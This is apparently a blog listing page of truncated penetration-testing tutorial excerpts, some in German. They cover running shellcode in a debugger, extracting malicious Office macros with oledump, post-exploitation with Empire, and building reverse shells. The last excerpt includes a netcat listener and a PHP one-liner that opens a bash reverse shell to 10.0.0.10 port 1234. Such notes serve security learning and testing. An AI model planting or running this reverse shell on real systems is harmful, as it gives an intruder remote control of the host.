-
See also the Buffer Overflow post Execute shellcode Scenario: You have shellcode. You want to run it to analyze it in a debugger. On Windows Add the shellcode after the breakpoint with i686-w64-mingw32-cc s.c -o s.exex86_64-w64-mingw32-cc s.c -o s.exe and run it in a debugger. On Linux Add the shellcode after the breakpoint with gcc [-m32] s.c…
-
Generic analysis tools Extract macros with oledump Use oledump.py to extract macros. List the file contents: python oledump.py $file Example from an output: ... 7: M 16267 'Macros/VBA/NewMacros' 8: m 932 'Macros/VBA/ThisDocument' ... To show details from a document part use the first number and execute python oledump.py -s $no $file But to extract Macros,…
-
Mainly post exploitation for AD environments. (Download — also included in Kali sources) Quick usage for privilege escalation General usage Metasploit syntax / PSE syntax Note: After usemodule don’t forget to go “back” and to “interact” with the agent to see job results! Commands with an asterix require a high-integrity Empire Agent. To upgrade one…
-
IF THE METERPRETER SHELL STUCKS, TRY TO ENTER ENTER MULTIPLE TIMES ON THE VICTIM. Aufbauen Lausche auf einem System, dass erreicht werden kann z.B. mit nc -lnvp 9998 [l=listen,v=verbose,p=port,n=no_resolution] Initiiere dann die Verbindung vom Zielsystem. Hier ein Beispiel direkt in PHP: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?> Anderes Beispiel, z.B. direkt in einer Konsole…